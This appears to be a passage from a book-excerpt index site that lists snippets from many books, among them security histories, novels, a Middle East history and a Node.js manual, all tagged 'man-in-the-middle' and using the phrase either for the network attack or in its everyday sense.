Even if the user and build steps are trustworthy, most builds have dependencies on other artifacts. Any such dependency is a surface through which adversaries can potentially subvert the build. For example, if the build system fetches a dependency over HTTP without TLS, an attacker can perform a man-in-the-middle attack to modify the dependency in transit. For this reason, we recommend hermetic builds (see “Hermetic, Reproducible, or Verifiable?”). The build process should declare all inputs up front, and only the orchestrator should fetch those inputs. Hermetic builds give much higher confidence that the inputs listed in the provenance are correct. Once you’ve accounted for untrusted and unauthenticated inputs, your system resembles Figure 14-6.

Your environment may have other secrets that need attention, such as keys used for encryption of data at rest and cryptographic keys used for SSL. If your frontend web serving infrastructure is compromised or potentially accessible by an attacker, you may need to consider rotating your SSL keys. If you don’t take action after an attacker steals your keys, they might use the keys to perform a man-in-the-middle attack. Similarly, if the encryption key for records in your database is on a compromised database server, the safest path forward is to rotate the keys and reencrypt the data. Cryptographic keys are often used for application-level communications, as well. If the attacker had access to systems where such application-level keys are stored, you’ll want to rotate the keys. Carefully consider where you store API keys, such as the keys you use for cloud-based services.


The Perfect Storm: A True Story of Men Against the Sea by Sebastian Junger

Dava Sobel, MITM: man-in-the-middle, North Sea oil, urban renewal

If the rescuers can't get Smith by helicopter, they'll get him by ship; if they can't get him by ship, they'll drop a life raft; if he's too weak to get into the life raft, they'll drop a rescue swimmer. Smith is one of their own, and they're going to get him one way or another. It's full dark when the first helicopter, zeroed-in by the marker buoy, arrives on-scene. There's no sign of Smith. The Coast Guard pilot who spotted him, debriefed back on-base, says the dye was fresh and he was "awful sure" there was a man in the middle of it. The seas were too rough to tell whether he swam to the life raft that was dropped to him, though. Three hours later one of the helicopter pilots radios that they've spotted Smith near the radio marker buoy. Another H-60 and tanker plane prepare to launch from Suffolk, but no sooner are those orders given than the pilot on-scene corrects himself: He didn't spot a person, he spotted a life raft.


pages: 274 words: 85,557

DarkMarket: Cyberthieves, Cybercops and You by Misha Glenny

Berlin Wall, Bretton Woods, Brian Krebs, BRICs, call centre, Chelsea Manning, Fall of the Berlin Wall, illegal immigration, James Watt: steam engine, Julian Assange, MITM: man-in-the-middle, pirate software, Potemkin village, reserve currency, Silicon Valley, Skype, Stuxnet, urban sprawl, white flight, WikiLeaks, zero day

This jumbled crossroads of imperial ambition, peculiar modern cultural icons and the dreamy nature of light form an ideal backdrop for the annual gathering of the Cooperative Cyber Defence Centre of Excellence (CCDOE), the NATO-backed complex that researches all aspects of cyber warfare. The characters at this conference live in a contemporary Wonderland where convention is oft disregarded – ponytails and wire-rimmed glasses earnestly exchange information with starched military uniforms about ‘SQL injection vulnerabilities’. Besuited civil servants are deep in conversation with young men in jeans and T-shirts detailing the iniquities of ‘man-in-the-middle attacks’. To grasp even the very basics of cyber security in its rich variety, one must be prepared to learn countless new idioms that are being constantly added to or amended. Otherwise you can listen to a conversation that in basic vocabulary and syntax structure is unmistakably English, but is nonetheless completely meaningless to those unschooled in the arcane language. It is, of course, embarrassing continually having to ask people fluent in the tongue why a ‘buffer overload’ can have alarming consequences for the security of your network, but geeks are not a patronising clan and are generally happy to oblige.


pages: 278 words: 83,504

Boeing Versus Airbus: The Inside Story of the Greatest International Competition in Business by John Newhouse

Airbus A320, airline deregulation, Bay Area Rapid Transit, Build a better mousetrap, corporate governance, demand response, low cost airline, low cost carrier, MITM: man-in-the-middle, upwardly mobile

However, dropping the protectionist rules would require changes in domestic law, and Congress, if asked, was certain to refuse amending existing law unless other countries—notably Britain, France, Germany, and Japan—extended reciprocal benefits to the United States.7 To no one’s surprise, BA’s proposed merger with USAir churned up political turmoil. Two strong multistate lobbies formed up. One, belonging to BA-USAir, fought hard and resourcefully to maneuver approval of the deal. The other fought just as hard on behalf of the big three/fat four, and it held better cards. The man in the middle was Andrew Card, then secretary of transportation and until recently President George W. Bush’s chief of staff. Given the prohibition on foreign ownership, Card would have had to veto the deal if it appeared to transfer control of USAir to BA. However, BA was proposing to acquire 21 percent of the voting stock and one-fourth of the board membership. That degree of control would have provided a blocking minority, one that could have enabled BA to approve or disapprove major aircraft purchases and capital outlays.


pages: 234 words: 84,737

We Are Never Meeting in Real Life by Samantha Irby

Affordable Care Act / Obamacare, MITM: man-in-the-middle, obamacare, rolodex, Rosa Parks, sensible shoes, Silicon Valley, Steve Jobs, white flight, Zipcar

At some point in the evening I would have to take you aside to explain that I was going to sell the children’s piano to fund the latest of my father’s harebrained schemes, but that he’d assured me that this one was going to be the one that finally paid back a return on my investment. There’d inevitably be a fight of some kind, resulting in your having to drive my sobbing mother home and my body-slamming an old-ass man in the middle of the TV room while your kids cower in fear in the kitchen. So I guess what I’m saying is that death can sometimes be pretty great. — I will have to keep your parents at arm’s length because yours is the kind of family that goes on extended vacations in the wilderness together, and I’m afraid that if they like me too much, they will expect me to go with, and I am doing no such thing. You get only one chance to drag me to the woods, and I already let you take me to that isolated cabin in the middle of nowhere for three days with no phone and no Wi-Fi, so see you when you get back.


pages: 746 words: 221,583

The Children of the Sky by Vernor Vinge

combinatorial explosion, epigenetics, indoor plumbing, megacity, MITM: man-in-the-middle, random walk, risk tolerance, technological singularity, the scientific method, Vernor Vinge

That doesn’t happen very often, and so far, Mr. Radio has kept it a secret from all the packs who are using him.” “Hmm,” said Ravna. “I wonder if he’s smart enough to play Princess Pretending.” “Huh?” The word came from both Amdi and Jefri. After a moment Ritl chimed in with a mimic interrogative of her own. “Sorry.” She had violated her personal ban on Princesses. “Straumers call it a ‘Man in the Middle’ attack.” “Oh yeah,” said Amdi, “I thought of that. The problem is Vendacious has conditioned all the members to follow certain forwarding protocols. At best Mr. Radio is variably intelligent. From moment to moment, he may be smart enough for simultaneous lying. In between, he’ll drop the ball.” Jefri nodded. “And if he fluffs even once, the game is over.” “Right.” Zek’s own voice spoke over Amdi’s: “Besides, I still not good to be a person, even when I can think with all of me.”

Dekutomon’s Fyr was probably closer than it had ever been before. That meant that Mr. Radio was at least a threesome. There were likely two others fairly close, one that had been used for long-range relay to Fyr and one at the head of the chain to the Tropics. Right now the radio pack could easily be a fully-connected fivesome, perhaps even smarter than the night it had linked them with Amdi. Maybe such a pack couldn’t run a full Man-in-the-Middle, but all it had to do was not relay all it heard from here. If it was willing to risk its life.… She glanced at Jefri. He was as pale as he could be, stricken. He gave her a nod, understanding. Meantime, Zek still looked at them, intent. The creature had made a brave offer. Okay. Ravna nodded at him, and quietly asked something that might be innocuous even if it were relayed to listeners up and down Mr.


pages: 681 words: 214,967

A Peace to End All Peace: The Fall of the Ottoman Empire and the Creation of the Modern Middle East by David Fromkin

anti-communist, British Empire, colonial rule, Khartoum Gordon, Khyber Pass, MITM: man-in-the-middle, Monroe Doctrine, trade route

Archibald Wavell (later Field Marshal Earl Wavell), an officer who served under Allenby in the Palestine campaign, commenting on the treaties bringing the First World War to an end
CONTENTS
List of Illustrations and Maps
Photo Credits
Acknowledgments
A Note on Spelling
Introduction
PART I At the Crossroads of History
1 THE LAST DAYS OF OLD EUROPE
2 THE LEGACY OF THE GREAT GAME IN ASIA
3 THE MIDDLE EAST BEFORE THE WAR
4 THE YOUNG TURKS URGENTLY SEEK AN ALLY
5 WINSTON CHURCHILL ON THE EVE OF WAR
6 CHURCHILL SEIZES TURKEY'S WARSHIPS
7 AN INTRIGUE AT THE SUBLIME PORTE
PART II Kitchener of Khartoum Looks Ahead
8 KITCHENER TAKES COMMAND
9 KITCHENER'S LIEUTENANTS
10 KITCHENER SETS OUT TO CAPTURE ISLAM
11 INDIA PROTESTS
12 THE MAN IN THE MIDDLE
PART III Britain is Drawn into the Middle Eastern Quagmire
13 THE TURKISH COMMANDERS ALMOST LOSE THE WAR
14 KITCHENER ALLOWS BRITAIN TO ATTACK TURKEY
15 ON TO VICTORY AT THE DARDANELLES
16 RUSSIA'S GRAB FOR TURKEY
17 DEFINING BRITAIN'S GOALS IN THE MIDDLE EAST
18 AT THE NARROWS OF FORTUNE
19 THE WARRIORS
20 THE POLITICIANS
21 THE LIGHT THAT FAILED
22 CREATING THE ARAB BUREAU
23 MAKING PROMISES TO THE ARABS
24 MAKING PROMISES TO THE EUROPEAN ALLIES
25 TURKEY'S TRIUMPH AT THE TIGRIS
PART IV Subversion
26 BEHIND ENEMY LINES
27 KITCHENER'S LAST MISSION
28 HUSSEIN'S REVOLT
PART V The Allies at the Nadir of Their Fortunes
29 THE FALL OF THE ALLIED GOVERNMENTS: BRITAIN AND FRANCE
30 THE OVERTHROW OF THE CZAR
PART VI New Worlds and Promised Lands
31 THE NEW WORLD
32 LLOYD GEORGE'S ZIONISM
33 TOWARD THE BALFOUR DECLARATION
34 THE PROMISED LAND
PART VII Invading the Middle East
35 JERUSALEM FOR CHRISTMAS
36 THE ROAD TO DAMASCUS
37 THE BATTLE FOR SYRIA
PART VIII The Spoils of Victory
38 THE PARTING OF THE WAYS
39 BY THE SHORES OF TROY
PART IX The Tide Goes Out
40 THE TICKING CLOCK
41 BETRAYAL
42 THE UNREAL WORLD OF THE PEACE CONFERENCES
PART X Storm over Asia
43 THE TROUBLES BEGIN: 1919—1921
44 EGYPT: THE WINTER OF 1918—1919
45 AFGHANISTAN: THE SPRING OF 1919
46 ARABIA: THE SPRING OF 1919
47 TURKEY: JANUARY 1920
48 SYRIA AND LEBANON: THE SPRING AND SUMMER OF 1920
49 EASTERN PALESTINE (TRANSJORDAN): 1920
50 PALESTINE—ARABS AND JEWS: 1920
51 MESOPOTAMIA (IRAQ): 1920
52 PERSIA (IRAN): 1920
PART XI Russia Returns to the Middle East
53 UNMASKING BRITAIN'S ENEMIES
54 THE SOVIET CHALLENGE IN THE MIDDLE EAST
55 MOSCOW'S GOALS
56 A DEATH IN BUKHARA
PART XII The Middle Eastern Settlement of 1922
57 WINSTON CHURCHILL TAKES CHARGE
58 CHURCHILL AND THE QUESTION OF PALESTINE
59 THE ALLIANCES COME APART
60 A GREEK TRAGEDY
61 THE SETTLEMENT OF THE MIDDLE EASTERN QUESTION
Notes
Bibliography
Index
LIST OF ILLUSTRATIONS AND MAPS
1 Lord Kitchener
2 Sir Mark Sykes
3 Enver
4 Talaat
5 Djemal
6 Crowds gather outside the Sublime Porte, 1913
7 Turkish soldiers at Dardanelles fort, 1915
8 Allied fleet at entrance to Dardanelles
9 Pictorial map of the Dardanelles
10 H.M.S.

Cairo and Constantinople both seemed to Simla to be pursuing policies that threatened to inflame Moslem passions in India and thus to imperil the Indian Empire. As the war progressed, British officials who ruled India increasingly came to believe that their most dangerous adversaries were neither the Turks nor the Germans, but the British officials governing Egypt; for despite India's protests, British Cairo went ahead with its intrigues in Mecca.
12 THE MAN IN THE MIDDLE
I
Mecca, where Mohammed was born, and Medina, to which he emigrated, are the holy cities that for Moslems everywhere give unique importance to the mountainous Hejaz, the long and narrow western section of the Arabian peninsula bordering the Red Sea. Hejaz means "separating"—a reference to the highlands that divide it from the plateau to the east. In the early twentieth century Arabia was an empty and desolate land, and the Hejaz, in the words of the 1910 Encyclopaedia Britannica, was "physically the most desolate and uninviting province in Arabia."


pages: 282 words: 92,998

Cyber War: The Next Threat to National Security and What to Do About It by Richard A. Clarke, Robert Knake

barriers to entry, complexity theory, data acquisition, Just-in-time delivery, MITM: man-in-the-middle, nuclear winter, packet switching, RAND corporation, Robert Hanssen: Double agent, Ronald Reagan, Silicon Valley, smart grid, South China Sea, Steve Jobs, trade route, undersea cable, Y2K, zero day

When plugged into a local or an Ethernet network, any user on the system can use a sniffer to pull in all the other traffic. The standard Ethernet protocol tells your computer to ignore everything that is not addressed to it, but that doesn’t mean it has to. An advanced packet sniffer on an Ethernet network can look at all the traffic. Your neighbors could sniff everything on the Internet on your street. More advanced sniffers can trick the network in what is known as a “man-in-the-middle” attack. The sniffer appears to the router as the user’s computer. All information is sent to the sniffer, which then copies the information before passing it on to the real addressee. Many (but not most) websites now use a secure, encrypted connection when you log on so that your password is not sent in the clear for anyone sniffing around to pick up. Due to cost and speed, most then drop the connection back into an unsecure mode after the password transmission is made.


Fearsome Particles by Trevor Cole

call centre, clean water, Khartoum Gordon, late fees, MITM: man-in-the-middle

“There’s people waiting,” said the girl, whose orange-and-white paper cap sat square on her head, suggestive of someone who took pride in her work, which Gerald would normally have applauded. She smiled insistently at him and Gerald smiled back. “He’s just going to be a minute.” Gerald turned and saw three people in line behind him. “It’ll just be a minute,” he repeated. “What are we waiting for?” said a wind-breakered woman at the end. “Some jerk gone to his car,” said a middle-aged farmer-type behind Gerald. A brokerish-looking man in the middle looked at the ceiling and sighed. “This is ridiculous,” said the woman. Gerald began to feel hot, and a little damp. He wanted to take off the jacket of his suit but he feared these people would mistake the movement for some sort of capitulation, and he had given the obese man his word. “He was in line before us,” said Gerald, addressing the queue. “He’s trying to treat his family. You would want the same courtesy.”


pages: 317 words: 98,745

Black Code: Inside the Battle for Cyberspace by Ronald J. Deibert

4chan, Any sufficiently advanced technology is indistinguishable from magic, Brian Krebs, call centre, citizen journalism, cloud computing, connected car, corporate social responsibility, crowdsourcing, cuban missile crisis, data acquisition, failed state, Firefox, global supply chain, global village, Google Hangouts, Hacker Ethic, informal economy, invention of writing, Iridium satellite, jimmy wales, John Markoff, Kibera, Kickstarter, knowledge economy, low earth orbit, Marshall McLuhan, MITM: man-in-the-middle, mobile money, mutually assured destruction, Naomi Klein, new economy, Occupy movement, Panopticon Jeremy Bentham, planetary scale, rent-seeking, Ronald Reagan, Ronald Reagan: Tear down this wall, Silicon Valley, Silicon Valley startup, Skype, smart grid, South China Sea, Steven Levy, Stuxnet, Ted Kaczynski, the medium is the message, Turing test, undersea cable, We are Anonymous. We are Legion, WikiLeaks, zero day

See also Citizen Lab, “Planet Blue Coat: Mapping Censorship and Surveillance Tools,” January 15, 2013, https://citizenlab.org/planetbluecoat.
4 the website of Al-Manar: Citizen Lab documented the hosting of Hezbullah and Syrian government websites on servers based in Canada in “The Canadian Connection: An Investigation of Syrian Government and Hezbullah Web Hosting in Canada,” November 17, 2011, http://citizenlab.org/wp-content/uploads/2011/11/canadian_connection.pdf; and “The Canadian Connection: One Year Later,” November 14, 2012, https://citizenlab.org/2012/11/the-canadian-connection-one-year-later/.
5 reports from inside Syria of phishing attacks: On phishing attacks around the Syrian conflict, see Eva Galperin and Morgan Marquis-Boire, “Syrian Activists Targeted with Facebook Phishing Attack,” Electronic Frontier Foundation, March 29, 2012, https://www.eff.org/deeplinks/2012/03/pro-syrian-government-hackers-target-syrian-activists-facebook-phishing-attack; and Eva Galperin and Morgan Marquis-Boire, “New Wave of Facebook Phishing Attacks Targets Syrian Activists,” Electronic Frontier Foundation, April 24, 2012, https://www.eff.org/deeplinks/2012/04/new-wave-facebook-phishing-attacks-targets-syrian-activists. See also Peter Eckersley, “A Syrian Man-In-The-Middle Attack Against Facebook,” Electronic Frontier Foundation, May 5, 2011, https://www.eff.org/deeplinks/2011/05/syrian-man-middle-against-facebook; and Jennifer Preston, “Seeking to Disrupt Protesters, Syria Cracks Down on Social Media,” New York Times, March 23, 2011, http://www.nytimes.com/2011/05/23/world/middleeast/23facebook.html?_r=4. Since March 2012, the Electronic Frontier Foundation has been collecting and analyzing malware that pro-Syrian-regime hackers have used to target the Syrian opposition.


pages: 342 words: 94,762

Wait: The Art and Science of Delay by Frank Partnoy

algorithmic trading, Atul Gawande, Bernie Madoff, Black Swan, blood diamonds, Cass Sunstein, Checklist Manifesto, cognitive bias, collapse of Lehman Brothers, collateralized debt obligation, computerized trading, corporate governance, Daniel Kahneman / Amos Tversky, delayed gratification, Flash crash, Frederick Winslow Taylor, George Akerlof, Google Earth, Hernando de Soto, High speed trading, impulse control, income inequality, information asymmetry, Isaac Newton, Long Term Capital Management, Menlo Park, mental accounting, meta analysis, meta-analysis, MITM: man-in-the-middle, Nick Leeson, paper trading, Paul Graham, payday loans, Ralph Nader, Richard Thaler, risk tolerance, Robert Shiller, Robert Shiller, Ronald Reagan, Saturday Night Live, six sigma, Spread Networks laid a new fibre optics cable between New York and Chicago, Stanford marshmallow experiment, statistical model, Steve Jobs, The Market for Lemons, the scientific method, The Wealth of Nations by Adam Smith, upwardly mobile, Walter Mischel

As John Gottman, the marriage guru, explains, “The reason our swift analysis works is because each thin slice of data is actually grounded in a tremendous amount of ‘thick slicing’—i.e., huge volumes of data that we’ve been collecting and validating on thousands of other couples for more than thirty years.”35 It turns out that a doctor glancing at a photograph of a black patient and a student watching a two-second video of a teacher are performing similar tasks. So is a young American woman looking at images of terrorist cells in the Middle East, or a young man in the Middle East looking at images of ostentatious wealth in America. Or any number of people everywhere who judge others based on first impressions. When we thin-slice, we reach powerful unconscious conclusions about others in seconds. Unfortunately, they are often wrong. Fortunately, they can be consciously unwound. Even contagious beliefs can reverse their spread. The authors of the racial contagion study worried about what happens when “a child feels her father grip her hand a little more tightly as they pass a black man on the street; or a little boy views his mother speak less and make less eye contact than usual while transacting with a black cashier at the supermarket.”36 But they also concluded, more hopefully, that “the flip side of these results, of course, is that acts of genuine egalitarianism can also shape racial attitudes toward equality.”37 Substitute any stereotyped group into the above passages and you have an apt description of many of the world’s problems.


pages: 324 words: 91,653

The Quantum Thief by Hannu Rajaniemi

augmented reality, cognitive dissonance, gravity well, haute couture, MITM: man-in-the-middle, music of the spheres

There are loops in it, places where a node – representing a memory, an event, a person – has more than one parent. That means that sometimes, sharing gevulot about an innocuous memory, a taste or an intimate moment, can unlock whole swathes of a person’s exomemory. The gogol pirates have software that tries to map out a person’s gevulot tree, tries to scan for the key nodes in conversation. There is a man-in-the-middle attack software that attempts to intercept the quantum communications between a Watch and the exomemory. That will require a lot more brute force, and quantum computation capability besides: I will have to talk to Perhonen about that. A perfect emulation of the privacy sense organ which I want to start running immediately. And finally, a set of public/private keys and blank exomemories to choose from.


pages: 329 words: 95,309

Digital Bank: Strategies for Launching or Becoming a Digital Bank by Chris Skinner

algorithmic trading, AltaVista, Amazon Web Services, Any sufficiently advanced technology is indistinguishable from magic, augmented reality, bank run, Basel III, bitcoin, business cycle, business intelligence, business process, business process outsourcing, buy and hold, call centre, cashless society, clean water, cloud computing, corporate social responsibility, credit crunch, crowdsourcing, cryptocurrency, demand response, disintermediation, don't be evil, en.wikipedia.org, fault tolerance, fiat currency, financial innovation, Google Glasses, high net worth, informal economy, Infrastructure as a Service, Internet of things, Jeff Bezos, Kevin Kelly, Kickstarter, M-Pesa, margin call, mass affluent, MITM: man-in-the-middle, mobile money, Mohammed Bouazizi, new economy, Northern Rock, Occupy movement, Pingit, platform as a service, Ponzi scheme, prediction markets, pre–internet, QR code, quantitative easing, ransomware, reserve currency, RFID, Satoshi Nakamoto, Silicon Valley, smart cities, social intelligence, software as a service, Steve Jobs, strong AI, Stuxnet, trade route, unbanked and underbanked, underbanked, upwardly mobile, We are the 99%, web application, WikiLeaks, Y2K

The bad news about mobile
As every bank is getting into mobile, there are issues. A good example is the coordinated ZeuS malware attack in Q4 2010, where a web application supposedly from the bank asks the victim to input their mobile phone number. The victim is then asked via text message to install an application onto the phone and the application is used to intercept any text messages the victim sends thereafter. There is also a whole load of new man-in-the-middle and mobile malware attacks that are growing by the day such as a recent Facebook update about Justin Bieber, which resulted in over 100,000 in 24 hours with 27% via mobile Facebook. Every viewing downloaded malware. Then there is mobile hi-jacking, where you think you are on your mobile carrier’s network but you’re not. This is where a cybercriminal places a signal box near to the location of the person they are targeting.


pages: 299 words: 87,059

The Burning Land by George Alagiah

fear of failure, land reform, MITM: man-in-the-middle, Nelson Mandela, out of africa, pre–internet, urban decay, white flight, éminence grise

‘But how does sitting back and watching Motlantshe come here, buy up the land and sell it off to foreigners help?’ ‘You think this is Motlantshe? You think he can do all these deals on his own and just keep the money to himself?’ Patel turned the engine off. ‘Ms Seaton, you need to know this whole stinking business goes all the way to the top. Those chaps in Pretoria are getting their cut. Motlantshe is just the deal-maker, the man in the middle.’ ‘But the figures are all published.’ ‘Oh, yes, they publish the figures they want you to see. The government got all these farms around here for nothing. Why didn’t the farmers shout and scream, eh?’ ‘You tell me.’ ‘Because our friend Motlantshe went round afterwards and paid them off.’ ‘What’s in it for Motlantshe?’ ‘The land is not sold outright to the foreign players. It is kept in a holding company, fifty-fifty.


pages: 342 words: 104,315

The Icon Thief by Alec Nevala-Lee

index card, MITM: man-in-the-middle

As he threw the switches one by one, hidden quadrants of the store came into view, revealing row after row of beds, desks, tables. Ilya surveyed the showroom. Aside from the three men on the couch, the sales floor was deserted. As they approached the Armenians, Ilya saw that the two on either side were barely out of high school, while the third seemed in his late twenties. When the two groups were close enough, Sharkovsky came forward, met by the man in the middle, and they shook hands twice, first the right, then the left. Standing back, Sharkovsky studied the younger man. “How is your grandfather, Arshak?” Arshak made a noncommittal gesture. “Are we here to talk, or to do business?” Sharkovsky did not seem troubled by this show of impatience. “Business, if you like. We can start with the toys.” At his signal, Misha came forward with the duffel bag, which clanked softly as he set it on the ground.


pages: 366 words: 107,145

Fuller Memorandum by Stross, Charles

Any sufficiently advanced technology is indistinguishable from magic, Beeching cuts, British Empire, cognitive dissonance, complexity theory, congestion charging, dumpster diving, finite state, Firefox, HyperCard, invisible hand, land reform, linear programming, MITM: man-in-the-middle, peak oil, post-work, security theater, sensible shoes, side project, Sloane Ranger, telemarketer, Turing machine

And that's another ten minutes wasted, bringing Iris up to speed on one of the minutiae of my job. It's not her fault she doesn't know where the dividing line between IT support scut-work and OPSEC protocol lies, although she catches on fast when I explain the predilection of class G3 abominations for traveling down Cat 5e cables and eating clerical staff, not to say anything about the ease with which a bad guy could stick a network sniffer on our backbone and do a man-in-the-middle attack on our authentication server if we let random cable installers loose under the floor tiles in the new building. Finally she leaves me alone, and I open the cover on BLOODY BARON and start reading. AN HOUR AND A HALF LATER I'M THOROUGHLY SPOOKED BY MY reading--so much so that I've had to put the file down a couple of times when I caught myself scanning the same sentence over and over again with increasing disbelief.


pages: 628 words: 107,927

Node.js in Action by Mike Cantelon, Marc Harter, Tj Holowaychuk, Nathan Rajlich

Amazon Web Services, Chris Wanstrath, create, read, update, delete, Debian, en.wikipedia.org, Firefox, Google Chrome, MITM: man-in-the-middle, MVC pattern, node package manager, p-value, pull request, Ruby on Rails, web application, WebSocket

Regular cookies

If you were to fire some HTTP requests off to the preceding server using curl(1) without the Cookie header field, both of the console.log() calls would output an empty object:

$ curl http://localhost:3000/
{}
{}

Now try sending a few cookies. You’ll see that both cookies are available as properties of req.cookies:

$ curl http://localhost:3000/ -H "Cookie: foo=bar, bar=baz"
{ foo: 'bar', bar: 'baz' }
{}

Signed cookies

Signed cookies are better suited for sensitive data, as the integrity of the cookie data can be verified, helping to prevent man-in-the-middle attacks. Signed cookies are placed in the req.signedCookies object when valid. The reasoning behind having two separate objects is that it shows the developer’s intention. If you were to place both signed and unsigned cookies in the same object, a regular cookie could be crafted to contain data to mimic a signed cookie. A signed cookie looks something like tobi.DDm3AcVxE9oneYnbmpqxoyhyKsk, where the content to the left of the period (.) is the cookie’s value, and the content to the right is the secret hash generated on the server with SHA-1 HMAC (hash-based message authentication code).


pages: 339 words: 103,546

Blood and Oil: Mohammed Bin Salman's Ruthless Quest for Global Power by Bradley Hope, Justin Scheck

augmented reality, Ayatollah Khomeini, clean water, coronavirus, distributed generation, Donald Trump, Downton Abbey, Elon Musk, Exxon Valdez, Google Earth, high net worth, Jeff Bezos, Marc Andreessen, Mark Zuckerberg, MITM: man-in-the-middle, new economy, Peter Thiel, ride hailing / ride sharing, Sand Hill Road, Silicon Valley, South of Market, San Francisco, sovereign wealth fund, starchitect, Steve Jobs, Tim Cook: Apple, trade route, Travis Kalanick, Uber for X, urban planning, women in the workforce, young professional, zero day

Wearing an open-necked shirt, Mohammed referred to advances in medicine that could make it possible for NEOM residents to live much longer than anyone in history. He might live hundreds of years, he said, explaining that he’d already begun investing in longevity research. One guest was unnerved: Did he think he would be ruler of Saudi Arabia until he was in his three hundreds? Was this the most powerful man in the Middle East?

Chapter 18
Cold Blood
October 2, 2018

As Jamal Khashoggi landed in Istanbul just before 4 a.m., the fifteen-man kill team was already getting into place. Zipping through customs, Khashoggi made his way to his new apartment in Zeytinburnu, on the European side of the city. The plan was to take a nap at what was to become his marital home with fiancée Hatice Cengiz before grabbing a quick meal nearby.


Wireless by Charles Stross

anthropic principle, back-to-the-land, Benoit Mandelbrot, Buckminster Fuller, Cepheid variable, cognitive dissonance, colonial exploitation, cosmic microwave background, epigenetics, finite state, Georg Cantor, gravity well, hive mind, jitney, Khyber Pass, lifelogging, Magellanic Cloud, mandelbrot fractal, MITM: man-in-the-middle, peak oil, phenotype, Pluto: dwarf planet, security theater, sensible shoes, Turing machine, undersea cable

Gregor waves hesitantly, and Brundle alters course. “Running late,” he pants, kicking at the pigeons until they flap away to make space for him at the other end of the bench. “Really?” Brundle nods. “They should be coming over the horizon in another five minutes.” “How did you engineer it?” Gregor isn’t particularly interested, but technical chitchat serves to pass the remaining seconds. “Man-in-the-middle, ramified by all their intelligence assessments.” Brundle looks self-satisfied. “Understanding their caste specialization makes it easier. Two weeks ago we told the GRU that MacNamara was using the NP-101 program as cover for a preemptive D-SLAM strike. At the same time we got the NOAA to increase their mapping-launch frequency, and pointed the increased level of Soviet activity out to our sources in SAC.


pages: 401 words: 112,784

Hard Times: The Divisive Toll of the Economic Slump by Tom Clark, Anthony Heath

Affordable Care Act / Obamacare, British Empire, business cycle, Carmen Reinhart, credit crunch, Daniel Kahneman / Amos Tversky, debt deflation, deindustrialization, Etonian, eurozone crisis, falling living standards, full employment, Gini coefficient, hedonic treadmill, hiring and firing, income inequality, interest rate swap, invisible hand, John Maynard Keynes: Economic Possibilities for our Grandchildren, Kenneth Rogoff, labour market flexibility, low skilled workers, MITM: man-in-the-middle, mortgage debt, new economy, Northern Rock, obamacare, oil shock, plutocrats, Plutocrats, price stability, quantitative easing, Right to Buy, Ronald Reagan, science of happiness, statistical model, The Wealth of Nations by Adam Smith, unconventional monetary instruments, War on Poverty, We are the 99%, women in the workforce, working poor

The big difference concerns wages, which have subsequently climbed by only 0.6% annually at the median.17 That implies that the typical employee has now been missing out on something like three-quarters of the extra prosperity that America has been generating over 40 years. The graph below captures this great divergence for male workers, for whom it has been most acute. While overall American output has roughly doubled since the 1970s, mostly because of rising productivity, the figure shows that the pay of the man in the middle, the median male worker, has barely budged. The woman in the middle has not fared quite so badly, but her modest progress has certainly not made up for the difficulties of the men: typical working-age household incomes in 2010 were stuck at the levels of the late 1980s.18 This grim picture is not the product of interpretations or definitions: tinker with the composition of remuneration – by adding in pensions or healthcare, for instance – and it does not brighten.20 The old story of a rising tide lifting all boats has simply ceased to apply.


pages: 385 words: 115,697

The Forever War by Dexter Filkins

animal electricity, friendly fire, Khyber Pass, MITM: man-in-the-middle, Thomas L Friedman

The orange jumpsuit: you knew right away that stood for Abu Ghraib, the place where the American soldiers had humiliated the Iraqi prisoners and taken photos for souvenirs. You knew right then the video wasn’t going to end well. But in the video, the young man seemed remarkably calm; as if he hadn’t imagined what was coming. Five men stood behind him, each wearing a mask and black clothing. The pale-skinned young man introduced himself. “My name is Nicholas Berg, from West Chester, Pennsylvania.” The masked man in the middle began reading from a script. He had a hoarse, guttural voice, not the voice of a gentle man. “Where is the sense of honor, where is the rage?” the masked man asked. “Where is the anger for God’s religion?” Then, with a little flip of his hand, the man with the hoarse voice handed his script to a man on his left. It was a nonchalant gesture, the kind an executive would make when he wanted his personal assistant to take his briefcase.


pages: 379 words: 113,656

Six Degrees: The Science of a Connected Age by Duncan J. Watts

Berlin Wall, Bretton Woods, business process, corporate governance, Drosophila, Erdős number, experimental subject, fixed income, Frank Gehry, Geoffrey West, Santa Fe Institute, industrial cluster, invisible hand, Long Term Capital Management, market bubble, Milgram experiment, MITM: man-in-the-middle, Murray Gell-Mann, Network effects, new economy, Norbert Wiener, Paul Erdős, peer-to-peer, rolodex, Ronald Coase, scientific worldview, Silicon Valley, supply-chain management, The Nature of the Firm, The Wealth of Nations by Adam Smith, Toyota Production System, transaction costs, transcontinental railway, Vilfredo Pareto, Y2K

To take a more prosaic example, in early 1999, when Shawn Fanning was a nineteen-year-old student at Northeastern University, he designed a piece of code to help a friend download MP3 music files from the Internet. The result, a program they nicknamed Napster, became an overnight phenomenon, attracting tens of millions of users and the ire of the entire recording industry, and throwing Fanning into the midst of a worldwide commercial, legal, and ethical maelstrom. At least for a while, Fanning was the man in the middle, lionized by some and demonized by others, quoted in business papers and pictured on magazine covers. Before finally being forced to charge fees for its music-sharing services, Napster (now largely defunct) and Fanning had succeeded in striking a deal with the global publishing giant Bertelsmann. Not a bad effort for a college kid! Apparently not, but whose effort was it really? The software that Fanning created was a neat trick, no doubt about it.


pages: 397 words: 114,841

High Steel: The Daring Men Who Built the World's Greatest Skyline by Jim Rasenberger

collective bargaining, Donald Trump, East Village, illegal immigration, MITM: man-in-the-middle, strikebreaker, Tacoma Narrows Bridge, union organizing, urban planning, young professional

Sometimes titled “Lunchtime on a Beam” or simply “Men on a Beam,” this famous photograph was shot in late September of 1932, 800 feet over Sixth Avenue during the construction of the RCA Building, as part of an elaborate Rockefeller Center publicity effort. It is often taken, incorrectly, for a Lewis Hine photo; in fact, it was shot by a publicity photographer named Hamilton Wright, Jr. As for the identity of the ironworkers, many Mohawks are convinced that the fourth from the left is Joe Jocks of Kahnawake, while Newfoundlanders insist that the shirtless man in the middle is Ray Costello of Conception Harbour. Captions on other photographs taken that same day identify the three men on the far left as John O’Rielly [sic], George Covan, and Joseph Eckner. The shirtless man whom Newfoundlanders believe to be Ray Costello is identified elsewhere as Howard Kilgore (though people who knew Costello swear it’s he) and the next three are identified as William Birger, Joe Curtis, and John Portla.


pages: 409 words: 112,055

The Fifth Domain: Defending Our Country, Our Companies, and Ourselves in the Age of Cyber Threats by Richard A. Clarke, Robert K. Knake

